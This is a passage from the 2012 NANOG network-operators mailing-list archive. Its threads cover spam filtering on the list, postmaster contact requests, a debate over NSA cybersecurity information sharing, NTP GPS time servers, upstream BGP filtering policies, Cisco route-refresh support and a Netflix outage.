the whole message; I'd already dropped him in my procmail rules. -- john From sethm at rollernet.us Tue Jul 10 11:25:29 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 10 Jul 2012 09:25:29 -0700 Subject: Admin? Bueller?
In-Reply-To: <20120710121641.31ab750b@godzilla.peachfamily.net> References: <20120710121641.31ab750b@godzilla.peachfamily.net> Message-ID: <4FFC5779.3030105@rollernet.us> On 7/10/12 9:16 AM, John Peach wrote: > On Tue, 10 Jul 2012 12:05:36 -0400 > shawn wilson wrote: > >> can some op filter this asshole? >> > > Please stop forwarding the whole message; I'd already dropped him in my > procmail rules. > I don't think the archives need to be archiving it, and those with corporate accounts on here may not appreciate explaining it to HR. Whatever admin that's asleep at the wheel needs to wake up. ~Seth From ag4ve.us at gmail.com Tue Jul 10 11:23:47 2012 From: ag4ve.us at gmail.com (shawn wilson) Date: Tue, 10 Jul 2012 12:23:47 -0400 Subject: *spam* Fwd: U.S. spy agencies ... email for cybersecurity In-Reply-To: <20120710121641.31ab750b@godzilla.peachfamily.net> References: <20120710121641.31ab750b@godzilla.peachfamily.net> Message-ID: On Tue, Jul 10, 2012 at 12:16 PM, John Peach wrote: > On Tue, 10 Jul 2012 12:05:36 -0400 > shawn wilson wrote: > >> can some op filter this asshole? >> > > Please stop forwarding the whole message; I'd already dropped him in my > procmail rules. > *shrug*, it needed a new thread since it ot of the originating thread. i feel that a maintained list should actively filter spam instead of expect users to setup their own filters. it's better for the list archives as well. From shrdlu at deaddrop.org Tue Jul 10 11:35:54 2012 From: shrdlu at deaddrop.org (Lynda) Date: Tue, 10 Jul 2012 09:35:54 -0700 Subject: Admin? Bueller? In-Reply-To: <4FFC5779.3030105@rollernet.us> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> Message-ID: <4FFC59EA.4050301@deaddrop.org> On 7/10/2012 9:25 AM, Seth Mattinen wrote: > On 7/10/12 9:16 AM, John Peach wrote: >> On Tue, 10 Jul 2012 12:05:36 -0400 >> shawn wilson wrote: >>> can some op filter... 
>> Please stop forwarding the whole message; I'd already dropped him in my >> procmail rules. +1 > I don't think the archives need to be archiving it, and those with > corporate accounts on here may not appreciate explaining it to HR. > Whatever admin that's asleep at the wheel needs to wake up. I just BCC'd someone, in case they aren't currently paying attention to the list. Seriously, though, this account should have been blocked after the very first message. There's enough traffic on the list without adding this (and all the resulting followups) to it, thanks. -- Politicians are like a Slinky. They're really not good for anything, but they still bring a smile to your face when you push them down a flight of stairs. From jlewis at lewis.org Tue Jul 10 11:37:33 2012 From: jlewis at lewis.org (Jon Lewis) Date: Tue, 10 Jul 2012 12:37:33 -0400 (EDT) Subject: Admin? Bueller? In-Reply-To: <4FFC5779.3030105@rollernet.us> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> Message-ID: On Tue, 10 Jul 2012, Seth Mattinen wrote: > On 7/10/12 9:16 AM, John Peach wrote: >> On Tue, 10 Jul 2012 12:05:36 -0400 >> shawn wilson wrote: >> >>> can some op filter this asshole? >>> >> >> Please stop forwarding the whole message; I'd already dropped him in my >> procmail rules. >> > > I don't think the archives need to be archiving it, and those with > corporate accounts on here may not appreciate explaining it to HR. > Whatever admin that's asleep at the wheel needs to wake up. Yahoo? Don't hold your breath. The person appears to have been using the same yahoo account for all the nig nog messages. Why whoever has admin rights to the mailing list hasn't removed/banned/filtered nanog195 at yahoo.com is a mystery. 
---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From jgreco at ns.sol.net Tue Jul 10 10:35:49 2012 From: jgreco at ns.sol.net (Joe Greco) Date: Tue, 10 Jul 2012 10:35:49 -0500 (CDT) Subject: Admin? Bueller? In-Reply-To: Message-ID: <201207101535.q6AFZnId074172@aurora.sol.net> > On Tue, 10 Jul 2012, Seth Mattinen wrote: > > On 7/10/12 9:16 AM, John Peach wrote: > >> On Tue, 10 Jul 2012 12:05:36 -0400 > >> shawn wilson wrote: > >> > >>> can some op filter this asshole? > >>> > >> > >> Please stop forwarding the whole message; I'd already dropped him in my > >> procmail rules. > >> > > > > I don't think the archives need to be archiving it, and those with > > corporate accounts on here may not appreciate explaining it to HR. > > Whatever admin that's asleep at the wheel needs to wake up. > > Yahoo? Don't hold your breath. The person appears to have been using the > same yahoo account for all the nig nog messages. Why whoever has admin > rights to the mailing list hasn't removed/banned/filtered > nanog195 at yahoo.com is a mystery. It's the union of mailing list on autopilot with service provider on autopilot. ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples. From grizz at dipd.com Tue Jul 10 11:41:23 2012 From: grizz at dipd.com (Matt Griswold) Date: Tue, 10 Jul 2012 11:41:23 -0500 Subject: Admin? Bueller? In-Reply-To: References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> Message-ID: <20120710114123.6265101e@segv> * Jon Lewis [120710 12:37 -0400]: > Yahoo? Don't hold your breath. 
The person appears to have been > using the same yahoo account for all the nig nog messages. Why > whoever has admin rights to the mailing list hasn't > removed/banned/filtered nanog195 at yahoo.com is a mystery. We were letting people practice their procmail :) They've both been filtered. From kurt at idb-sys.com Tue Jul 10 11:48:04 2012 From: kurt at idb-sys.com (Kurt Ellzey) Date: Tue, 10 Jul 2012 12:48:04 -0400 Subject: Admin? Bueller? In-Reply-To: <20120710114123.6265101e@segv> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: <03aa01cd5ebb$c6a85bb0$53f91310$@idb-sys.com> >We were letting people practice their procmail :) They've both been filtered. It's situations like this that make me happy I signed up. I just started with the list this week, and finding out tools for correcting specific tasks is outstanding. Finding ones that actually WORK is a bonus. Thanks for the tip. From ryan.g at atwgpc.net Tue Jul 10 11:46:21 2012 From: ryan.g at atwgpc.net (Ryan Gelobter) Date: Tue, 10 Jul 2012 11:46:21 -0500 Subject: Hotmail/live In-Reply-To: References: Message-ID: I'd appreciate it if a postmaster from the Hotmail/Live team could contact me off-list as well. My previous contacts are no longer part of the Hotmail team and haven't been able to successfully get me in touch with anyone over there. On Wed, Jun 27, 2012 at 12:18 PM, matt kelly wrote: > Can a hotmail/live.com postmaster contact me offlist please? > > Thanks > From jcdill.lists at gmail.com Tue Jul 10 11:48:19 2012 From: jcdill.lists at gmail.com (JC Dill) Date: Tue, 10 Jul 2012 09:48:19 -0700 Subject: Admin? Bueller? In-Reply-To: <4FFC5779.3030105@rollernet.us> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> Message-ID: <4FFC5CD3.1070609@gmail.com> On 10/07/12 9:25 AM, Seth Mattinen wrote: > Whatever admin that's asleep at the wheel needs to wake up. 
~Seth I'm really surprised that people who subscribe to NANOG don't know any better than to send their complaints TO THE LIST ADDRESS instead of emailing the ADMIN address. Sheesh - it's worse than AOL around here these days. jc From valdis.kletnieks at vt.edu Tue Jul 10 11:48:08 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 10 Jul 2012 12:48:08 -0400 Subject: Admin? Bueller? In-Reply-To: Your message of "Tue, 10 Jul 2012 11:41:23 -0500." <20120710114123.6265101e@segv> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: <40490.1341938888@turing-police.cc.vt.edu> On Tue, 10 Jul 2012 11:41:23 -0500, Matt Griswold said: > We were letting people practice their procmail :) They've both been > filtered. "both"? I only noticed one source account? From dougb at dougbarton.us Tue Jul 10 11:55:29 2012 From: dougb at dougbarton.us (Doug Barton) Date: Tue, 10 Jul 2012 09:55:29 -0700 Subject: Admin? Bueller? In-Reply-To: <4FFC5CD3.1070609@gmail.com> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <4FFC5CD3.1070609@gmail.com> Message-ID: <4FFC5E81.5060101@dougbarton.us> On 7/10/2012 9:48 AM, JC Dill wrote: > On 10/07/12 9:25 AM, Seth Mattinen wrote: >> Whatever admin that's asleep at the wheel needs to wake up. ~Seth > > I'm really surprised that people who subscribe to NANOG don't know any > better than to send their complaints TO THE LIST ADDRESS instead of > emailing the ADMIN address. Sheesh - it's worse than AOL around here > these days. Me too! 
-- If you're never wrong, you're not trying hard enough From george.herbert at gmail.com Tue Jul 10 12:16:36 2012 From: george.herbert at gmail.com (George Herbert) Date: Tue, 10 Jul 2012 10:16:36 -0700 Subject: Admin? Bueller? In-Reply-To: <20120710114123.6265101e@segv> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: On Tue, Jul 10, 2012 at 9:41 AM, Matt Griswold wrote: > * Jon Lewis [120710 12:37 -0400]: >> Yahoo? Don't hold your breath. The person appears to have been >> using the same yahoo account for all the nig nog messages. Why >> whoever has admin rights to the mailing list hasn't >> removed/banned/filtered nanog195 at yahoo.com is a mystery. > > We were letting people practice their procmail :) They've both been > filtered. Scary thought - is there nobody from Yahoo on NANOG anymore? I mean, really, if you are at provider X and provider X starts spamming the list, I would think you'd deal with that internally... 8-( -- -george william herbert george.herbert at gmail.com From morrowc.lists at gmail.com Tue Jul 10 12:22:24 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 10 Jul 2012 13:22:24 -0400 Subject: Admin? Bueller? In-Reply-To: References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: On Tue, Jul 10, 2012 at 1:16 PM, George Herbert wrote: > I mean, really, if you are at provider X and provider X starts > spamming the list, I would think you'd deal with that internally... it's a tad rough to call what's happening 'spamming', it's surely 'sending off-topic mails to a list'. I'm not sure yahoo would classify (or most other folks) this as 'bad enough to ban the account' yet. the admins of the nanog-list could certainly take action though. 
From ag4ve.us at gmail.com Tue Jul 10 12:39:43 2012 From: ag4ve.us at gmail.com (shawn wilson) Date: Tue, 10 Jul 2012 13:39:43 -0400 Subject: Admin? Bueller? In-Reply-To: References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: On Tue, Jul 10, 2012 at 1:22 PM, Christopher Morrow wrote: > the admins of the nanog-list could certainly take action though. > the reason for my email is that it was the second ot type email in a week and i was hoping someone could clarify what the moderators will and won't do. i don't think an isp should block an email of this type - it doesn't appear the account has been compromised at this point. the email is ot to the list, not a compromise to the sender or isp. From morrowc.lists at gmail.com Tue Jul 10 15:47:53 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 10 Jul 2012 16:47:53 -0400 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: <4FFB898B.2000908@gmail.com> Message-ID: On Mon, Jul 9, 2012 at 11:22 PM, Christopher Morrow wrote: > (note, people ought to: 1) think about this on their own making up > their own minds, 2) understand that the press has some very weird > ideas, 3) take some better protections on their own, for their own > security) > > also, I'm not judging the OP nor the reporter nor the ideas espoused > in the article/clips... > > On Mon, Jul 9, 2012 at 9:46 PM, William Allen Simpson > wrote: >> Somebody needs to give them a clue-by-four. The private sector > > people keep trying, sometimes it's helped. sometimes reporters need to > sell stories :( > >> already has the "Internet address where an email ... originated"; > > it's not just email they care about :( (you knew that I think) > >> it's already in the Received lines. We don't need to be informed >> about it, we already inform each other about it. 
> > one interesting idea, that has proven out some merit over the years is > the ability to share 'incident' data across entry points (say across > companies, or gov'ts even) about 'bad things' that are happening. > > Take the case of 'spam came in from this end system to my mailserver', > if I tell you that (or some central system that which you can query) > you'll learn that maybe the inbound connection to you is also > spam-rich. > >> And it's already delivered "at network speed." >> > > the article sort of reads like the above scenario though... maybe it's > NOT that, maybe it's something else entirely... it SEEMS that the > gov't wants to help. They may be able to, they may just foul things > up. The reporter certainly didn't leave enough details in place to > tell :( > >> It is my understanding the Dept of Homeland Security already >> cooperates in sharing government intrusion information. We certainly >> don't need a "U.S. spy agency" MITM to "protect the private sector." > > > > you may mean? could be... the wikipedias are sometimes wrong, or so > says the teacher of my 7yr old. > >> Moreover, the US is the source of most spam and malware, so the NSA >> isn't really going to be much help. And the US is the source of the > > but hosts in the US that are botted/spamming, also spam/bot other > things outside the US, right? so really who cares where the src is, > get some data collection points up and use that data to inform your > security policy, no? (sure, you'll have to have some smarts, and some > smart people, and be cautious... but you'd do that anyway, right? :) ) > > These folks have some awesome tech for that sort of data collection > and analysis: > > > it's a shame that their parent company can't find a way to monetize > that sort of thing. 
(the article there talks about some older version > of the system, which is still alive/well today doing fraud detection > and was doing some IDS/anomaly-detection-like work as well for ip > network things) to be fair to vz/mci here, an offline reader pointed me to: hey lookie, they sold one :) (hopefully for the sheriff folks, they can do more of this, it really is cool) >> only known cyber attacks on other country's infrastructure, so it's >> not likely much help there, either. Unless they expect retaliation? >> >> === >> >> http://in.reuters.com/article/2012/07/10/net-us-usa-security-cyber-idINBRE86901620120710 >> >> U.S. spy agencies say won't read Americans' email for cybersecurity >> 8:48pm EDT >> >> By Tabassum Zakaria and David Alexander >> >> WASHINGTON (Reuters) - The head of the U.S. spy agency that eavesdrops on >> electronic communications overseas sought on Monday to reassure Americans >> that the National Security Agency would not read their personal email if >> a new cybersecurity law was enacted to allow private companies to share >> information with the government. >> ... >> >> But to help protect the private sector, he said it was important that the >> intelligence agency be able to inform them about the type of malicious > > translated: "Hey, what if we could tell our private sector partners > (Lockheed-Martin, for instance) that they should be on the lookout for > things like X, or traffic destined to Y, or people sending all their > DNS queries to these 5 netblocks." (dcwg.org sorta crap) > > that doesn't sound 'bad', it sounds like there is a gap in the > business world to wrap all this data up and sell access to it... but > the gov't can jump in with their mountains of data from their > 'einstein' or whatever and go to town protecting their 'partners' who > have often close interactions with the gov't, right? 
> >> software and other cyber intrusions it is seeing and hear from companies >> about what they see breaching the protective measures on their computer >> networks. > > adding to the above: "What if we had an API such that you could feed > your collected alarm/alert/badness data to us as well? and we could > feed that back into our system, protect ourselves AND send it back out > to the other partners?" > > again, that's not that bad, really it sounds pretty cool... only if > MCI could have found a way to productize and monetize that... which we > built for them too :( but I digress. > >> "It doesn't require the government to read their mail or your mail to do >> that. It requires them, the Internet service provider or that company, to >> tell us that that type of event is going on at this time. And it has to be >> at network speed if you're going to stop it," Alexander said. > > alexander is loose with his pronouns, which makes this worse... in > reality: "send your alarm data to our system, hurrah!", PROBABLY this > could include large ISP people if the pricing (or regulatory world > were right), these folks COULD of course limit that to 'business isp > traffic only', maybe. > > this sounds a little less on the ball though, so I'll blame bad > reporter-translation, and hope that Alexander really meant: "Our > partners in the industry, who help supply us and build our widgets for > us, would be enabled to send data into our API..." > >> >> He said the information the government was seeking was the Internet >> address where an email containing malicious software originated and >> where it traveled to, not the content of the email. > > I'm sure this was simply an example... and the reporter jumped on it > like a carnivore, poor job reporter! :( > >> ... >> >> But the U.S. government is also concerned about the possibility of a cyber >> attack from adversaries on critical infrastructure such as the power grid or >> transportation systems. 
> > yes, put in the boogie-man! also, keep in mind that CI things are ... > in a horrid state, and as it turns out the folk running it are > ostriches :( > > -chris From morrowc.lists at gmail.com Tue Jul 10 15:48:46 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 10 Jul 2012 16:48:46 -0400 Subject: Admin? Bueller? In-Reply-To: References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: On Tue, Jul 10, 2012 at 1:39 PM, shawn wilson wrote: > On Tue, Jul 10, 2012 at 1:22 PM, Christopher Morrow > wrote: > >> the admins of the nanog-list could certainly take action though. >> > > the reason for my email is that it was the second ot type email in a > week and i was hoping someone could clarify what the moderators will > and won't do. oh sure, the admins can/should find an answer to this... since it's annoying. > i don't think an isp should block an email of this type - it doesn't > appear the account has been compromised at this point. the email is ot > to the list, not a compromise to the sender or isp. From nanog at armorfirewall.com Tue Jul 10 17:22:47 2012 From: nanog at armorfirewall.com (George - AD7RL) Date: Tue, 10 Jul 2012 15:22:47 -0700 (MST) Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: <4FFB898B.2000908@gmail.com> Message-ID: To be fair, we really should listen to what he had to say; http://www.c-span.org/Events/Director-of-NSA-Outlines-New-Threats-to-Security-and-Economy/10737432170-1/ The introduction by Wolfowitz doesn't really help the credibility, but the master of FUD knows you have to build a foundation of truth in order to layer on the FUD. Alexander's technical discussion is pretty good. He seems to at least know the basics of the issues he addresses. It's his conclusions I have trouble with. First and foremost, he proposes addressing the problem of insecure systems by layering on another system. 
This approach hasn't worked yet, and is even less likely to work in the future. If they build this system, can they keep malicious hackers out? Chinese? Russians? If they can build this system securely, why not just go without it, and rebuild the existing systems securely? While they may only be interested in data streams, and not email content, as he said: How will you build it with the capability of examining binary attachments or links, but not email content? By nature, this system would have the capability of reading our mail, even if that's not the stated purpose. How long until mission creep starts looking for keywords? Then there are issues of concern mainly to technical people. Many on this list have the capability of doing some really bad stuff to the network. Would it be justifiable to watch these people a little more closely than the general public? The public might not mind (yet), but should all of our discussions (i.e., intellectual property) be automatically forfeited to the government? Both signed and proposed legislation have opened the door to "greater cooperation between the military and homeland security". Should this capability of the military be available to DHS to hunt out "subversives"? Can they guarantee that there will be no mission creep? No searching (or archiving) of email contents? And most of all, can they guarantee that it will never get pwned? Cheers, G_ From aj at jonesy.com.au Tue Jul 10 21:44:39 2012 From: aj at jonesy.com.au (Andrew Jones) Date: Wed, 11 Jul 2012 12:44:39 +1000 Subject: Requesting off-list contact from a verizon.net mail admin Message-ID: <3ff9720c1f9e4d17e9110d48001a7253@localhost> If someone who looks after verizon.net mail is listening, I would appreciate them contacting me regarding some issues we are having getting email through from our IP range. We've tried all the usual email channels (no response), and the online form insists that reverse DNS is missing (it's not) or the address is dynamic (it's not). 
Thanks, Andrew Jones Daraco Services From jerome at ceriz.fr Wed Jul 11 03:37:02 2012 From: jerome at ceriz.fr (Jérôme Nicolle) Date: Wed, 11 Jul 2012 10:37:02 +0200 Subject: strat-1 gps In-Reply-To: References: Message-ID: <4FFD3B2E.1050400@ceriz.fr> On 26/06/2012 19:30, Randy Bush wrote: > my old TymServe 2100-GPS seems to have died. would appreciate reccos > for a replacement. it is in a stand-alone environment so i can avoid > roof access issues. antenna already in place. thanks. > > randy > If you're looking for something fancy, you may want to check out http://www.timeservers.eu/Products/Time-Server-NTS4000 Multiple sync sources (GPS, Glonass, Galileo, GSM, input for rubidium or cesium clocks, 1PPS straight input for analog radio sync), compact form factor, dual (up to 6) LAN ports for redundancy... This device does it all :) several models and options are available, ranging from $3k to $8k AFAIK. -- Jérôme Nicolle +33 6 19 31 27 14 From luqman.kondeth at nyu.edu Wed Jul 11 07:47:55 2012 From: luqman.kondeth at nyu.edu (Luqman Kondeth) Date: Wed, 11 Jul 2012 16:47:55 +0400 Subject: LEVEL3, FLAG, NTT peering policies Message-ID: HI All, Apologies if this has been asked before, I was hoping to get a quick answer to rescue a situation :). We are advertising our prefixes to an ISP in the region who has level3, ntt & flag telecom as its upstream providers. I wanted to know if ntt & flag telecom have any BGP filtering policy based on AS or IP prefixes? I know level3 has such policies which are downloaded from the RIPE DB according to their published peering policy document. I've read through the peering policies of NTT & FLAG ( http://www.us.ntt.net/support/policy/routing.cfm , http://www.onesc.net/communities/as15412/ ) and do not see anything which would suggest they use the ripe db or any other db for filtering based on AS or IP prefixes. 
In fact, it doesn't seem they have an inbound filter policy on IP prefixes or AS. Could someone please confirm? Many thanks From jared at puck.nether.net Wed Jul 11 08:13:36 2012 From: jared at puck.nether.net (Jared Mauch) Date: Wed, 11 Jul 2012 09:13:36 -0400 Subject: LEVEL3, FLAG, NTT peering policies In-Reply-To: References: Message-ID: <69B22218-8376-4974-9054-532A273F039F@puck.nether.net> NTT uses a variety of routing registries. Please see http://www.us.ntt.net/support/policy/rr.cfm for information. - Jared On Jul 11, 2012, at 8:47 AM, Luqman Kondeth wrote: > HI All, > > Apologies if this has been asked before, I was hoping to get a quick answer > to rescue a situation :). > > We are advertising our prefixes to an ISP in the region who has level3, ntt > & flag telecom as its upstream providers. I wanted to know if ntt & flag > telecom have any BGP filtering policy based on AS or IP prefixes? > > I know level3 has such policies which are downloaded from the RIPE DB > according to their published peering policy document. > > I've read through the peering policies of NTT & FLAG ( > http://www.us.ntt.net/support/policy/routing.cfm , > http://www.onesc.net/communities/as15412/ ) and do not see anything which > would suggest they use the ripe db or any other db for filtering based on > AS or IP prefixes. In fact, it doesn't seem they have an inbound filter > policy on IP prefixes or AS. > > > > Could someone please confirm? > > > > Many thanks From jerry at jdixon.com Wed Jul 11 09:08:01 2012 From: jerry at jdixon.com (Jerry Dixon) Date: Wed, 11 Jul 2012 10:08:01 -0400 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: <4FFB898B.2000908@gmail.com> Message-ID: It's more of a strategy to centralize protection efforts versus using a de-centralized approach. 
I want go into the scalability issues and also "scope" creep aspects however, as Chris points out, it would be far better to share indications & warnings with organizations that can leverage their own security infrastructure to protect themselves. Organizations have different risk management profiles meaning they know what is important to protect to sustain their business and will make decisions based off of that. You can share this information automated style depending on your level of trust of what is being provided so things can move at the speed of light so to speak however this is still, yet another, reactive approach. We all know the issues of signature based systems. However, their intent is good and all about protecting the country. The approach can be debated though :) Jerry On Mon, Jul 9, 2012 at 11:22 PM, Christopher Morrow wrote: > (note, people ought to: 1) think about this on their own making up > their own minds, 2) understand that the press has some very weird > ideas, 3) take some better protections on their own, for their own > security) > > also, I'm not judging the OP nor the reporter nor the ideas espoused > in the article/clips... > > On Mon, Jul 9, 2012 at 9:46 PM, William Allen Simpson > wrote: > > Somebody needs to give them a clue-by-four. The private sector > > people keep trying, sometimes it's helped. sometimes reporters need to > sell stories :( > > > already has the "Internet address where an email ... originated"; > > it's not just email they care about :( (you knew that I think) > > > it's already in the Received lines. We don't need to be informed > > about it, we already inform each other about it. > > one interesting idea, that has proven out some merit over the years is > the ability to share 'incident' data across entry points (say across > companies, or gov'ts even) about 'bad things' that are happening. 
> > Take the case of 'spam came in from this end system to my mailserver', > if I tell you that (or some central system that which you can query) > you'll learn that maybe the inbound connection to you is also > spam-rich. > > > And it's already delivered "at network speed." > > > > the article sort of reads like the above scenario though... maybe it's > NOT that, maybe it's something else entirely... it SEEMS that the > gov't wants to help. They may be able to, they may just foul things > up. The reporter certainly didn't leave enough details in place to > tell :( > > > It is my understanding the Dept of Homeland Security already > > cooperates in sharing government intrusion information. We certainly > > don't need a "U.S. spy agency" MITM to "protect the private sector." > > > > you may mean? could be... the wikipedias are sometimes wrong, or so > says the teacher of my 7yr old. > > > Moreover, the US is the source of most spam and malware, so the NSA > > isn't really going to be much help. And the US is the source of the > > but hosts in the US that are botted/spamming, also spam/bot other > things outside the US, right? so really who cares where the src is, > get some data collection points up and use that data to inform your > security policy, no? (sure, you'll have to have some smarts, and some > smart people, and be cautious... but you'd do that anyway, right? :) ) > > These folks have some awesome tech for that sort of data collection > and analysis: > > > it's a shame that their parent company can't find a way to monetize > that sort of thing. (the article there talks about some older version > of the system, which is still alive/well today doing fraud detection > and was doing some IDS/anomaly-detection-like work as well for ip > network things) > > > only known cyber attacks on other country's infrastructure, so it's > > not likely much help there, either. Unless they expect retaliation? 
> > > > === > > > > > http://in.reuters.com/article/2012/07/10/net-us-usa-security-cyber-idINBRE86901620120710 > > > > U.S. spy agencies say won't read Americans' email for cybersecurity > > 8:48pm EDT > > > > By Tabassum Zakaria and David Alexander > > > > WASHINGTON (Reuters) - The head of the U.S. spy agency that eavesdrops on > > electronic communications overseas sought on Monday to reassure Americans > > that the National Security Agency would not read their personal email if > > a new cybersecurity law was enacted to allow private companies to share > > information with the government. > > ... > > > > But to help protect the private sector, he said it was important that the > > intelligence agency be able to inform them about the type of malicious > > translated: "Hey, what if we could tell our private sector partners > (Lockheed-Martin, for instance) that they should be on the lookout for > things like X, or traffic destined to Y, or people sending all their > DNS queries to these 5 netblocks." (dcwg.org sorta crap) > > that doesn't sound 'bad', it sounds like there is a gap in the > business world to wrap all this data up and sell access to it... but > the gov't can jump in with their mountains of data from their > 'einstein' or whatever and go to town protecting their 'partners' who > have often close interactions with the gov't, right? > > > software and other cyber intrusions it is seeing and hear from companies > > about what they see breaching the protective measures on their computer > > networks. > > adding to the above: "What if we had an API such that you could feed > your collected alarm/alert/badness data to us as well? and we could > feed that back into our system, protect ourselves AND send it back out > to the other partners?" > > again, that's not that bad, really it sounds pretty cool... only if > MCI could have found a way to productize and monetize that... which we > built for them too :( but I digress. 
> > > "It doesn't require the government to read their mail or your mail to do > > that. It requires them, the Internet service provider or that company, to > > tell us that that type of event is going on at this time. And it has to > be > > at network speed if you're going to stop it," Alexander said. > > alexander is loose with his pronouns, which makes this worse... in > reality: "send your alarm data to our system, hurrah!", PROBABLY this > could include large ISP people if the pricing (or regulatory world > were right), these folks COULD of course limit that to 'business isp > traffic only', maybe. > > this sounds a little less on the ball though, so I'll blame bad > reporter-translation, and hope that Alexander really meant: "Our > partners in the industry, who help supply us and build our widgets for > us, would be enabled to send data into our API..." > > > > > He said the information the government was seeking was the Internet > > address where an email containing malicious software originated and > > where it traveled to, not the content of the email. > > I'm sure this was simply an example... and the reporter jumped on it > like a carnivore, poor job reporter! :( > > > ... > > > > But the U.S. government is also concerned about the possibility of a > cyber > > attack from adversaries on critical infrastructure such as the power > grid or > > transportation systems. > > yes, put in the boogie-man! also, keep in mind that CI things are ... 
> in a horrid state, and as it turns out the folk running it are > ostriches :( > > -chris > > -- Jerry jerry at jdixon.com From jmaimon at ttec.com Wed Jul 11 09:56:33 2012 From: jmaimon at ttec.com (Joe Maimon) Date: Wed, 11 Jul 2012 10:56:33 -0400 Subject: [c-nsp] automatic bgp route refresh In-Reply-To: <4F43B36D.7070405@ttec.com> References: <4F43B36D.7070405@ttec.com> Message-ID: <4FFD9421.5030606@ttec.com> Joe Maimon wrote: > Hey All, > > I would greatly appreciate it if somebody would point me to the release > notes for the change I see in 15.1 where BGP neighbor route-map > configurations happen in real time, without needing any clearing, soft > or otherwise. > > Much obliged. > > Best, > > Joe So I opened the TAC case, went through the repro multiple times, documented it, webexed it, discussed it. First I am told that there is an undocumented command to turn it off. " The feature we are talking about is route refresh capability this is a bgp hidden command which will not negotiate this capability and you will have to manually refresh routes after making any configuration changes. neighbor x.x.x.x dont-capability-negotiate enhanced-refresh " Which does not work. Then I am told that all IOS have been updated to do this and that there are no publicly available release notes for this change and if I want any further help, I need to have my account manager convince them that I am worthy. Which seems to be the way they try to resolve all cases these days. Cisco support has sunk to new levels. You end up paying them to sadistically torture and tantalize you. Which I am not into. I remember when they would actually file a bug when you found one (with a mtrr +-2yrs). 
Best, Joe From steve at pirk.com Wed Jul 11 12:00:41 2012 From: steve at pirk.com (steve pirk [egrep]) Date: Wed, 11 Jul 2012 10:00:41 -0700 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: On Mon, Jul 9, 2012 at 10:20 AM, Dave Hart wrote: > "We continue to investigate why these connections were timing out > during connect, rather than quickly determining that there was no > route to the unavailable hosts and failing quickly." > > potential translation: > > "We continue to shoot ourselves in the foot by filtering all ICMP > without understanding the implications." > > Sorry to mention my favorite hardware vendor again, but that is what I liked about using F5 BigIP as load balancing devices... They did layer 7 url checking to see if the service was really responding (instead of just pinging or opening a connection to the IP). We performed tests that would do a complete LDAP SSL query to verify a directory server could actually look up a person. If it failed to answer within a certain time frame, then it was taken out of rotation. I do not know if that was ever implemented in production, but we did verify it worked. On the "software in the hardware can fail" point, my only defense is you do redundant testing of the watcher devices, and have enough of them to vote misbehaving ones out of service. Oh, and it is best if the global load balancing hardware/software is located somewhere else besides the data centers being monitored. -- steve pirk From heather.schiller at verizon.com Wed Jul 11 12:04:06 2012 From: heather.schiller at verizon.com (Schiller, Heather A) Date: Wed, 11 Jul 2012 13:04:06 -0400 Subject: Requesting off-list contact from a verizon.net mail admin In-Reply-To: <3ff9720c1f9e4d17e9110d48001a7253@localhost> References: <3ff9720c1f9e4d17e9110d48001a7253@localhost> Message-ID: Replied off list.. 
--Heather -----Original Message----- From: Andrew Jones [mailto:aj at jonesy.com.au] Sent: Tuesday, July 10, 2012 10:45 PM To: nanog at nanog.org Subject: Requesting off-list contact from a verizon.net mail admin If someone who looks after verizon.net mail is listening, I would appreciate them contacting me regarding some issues we are having getting email through from our IP range. We've tried all the usual email channels (no response), and the online form insists that reverse DNS is missing (it's not) or the address is dynamic (it's not). Thanks, Andrew Jones Daraco Services From thegameiam at yahoo.com Wed Jul 11 13:32:29 2012 From: thegameiam at yahoo.com (David Barak) Date: Wed, 11 Jul 2012 11:32:29 -0700 (PDT) Subject: job screening question Message-ID: <1342031549.49362.YahooMailMobile@web31812.mail.mud.yahoo.com> (please excuse the top post) If you want a great analysis of how this happened before, check out Clanchy's book _From memory to written record_ about the implications of the spread of literacy as a technology in England in the 1300s. David Barak From jeroen at mompl.net Wed Jul 11 15:04:37 2012 From: jeroen at mompl.net (Jeroen van Aart) Date: Wed, 11 Jul 2012 13:04:37 -0700 Subject: Cisco Update In-Reply-To: <201207071430.q67EUDjx019523@aurora.sol.net> References: <201207071430.q67EUDjx019523@aurora.sol.net> Message-ID: <4FFDDC55.3080406@mompl.net> Joe Greco wrote: > No, really, how bad an idea can it be to have a central database and > a system that's allowed to remotely log in, configure, and update > thousands of Internet-connected CPE? I mean, talk about making an > attractive target. No argument against the lack of 